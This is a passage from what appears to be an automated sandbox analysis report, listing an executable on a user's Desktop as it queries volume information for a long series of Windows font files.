              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exe | Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
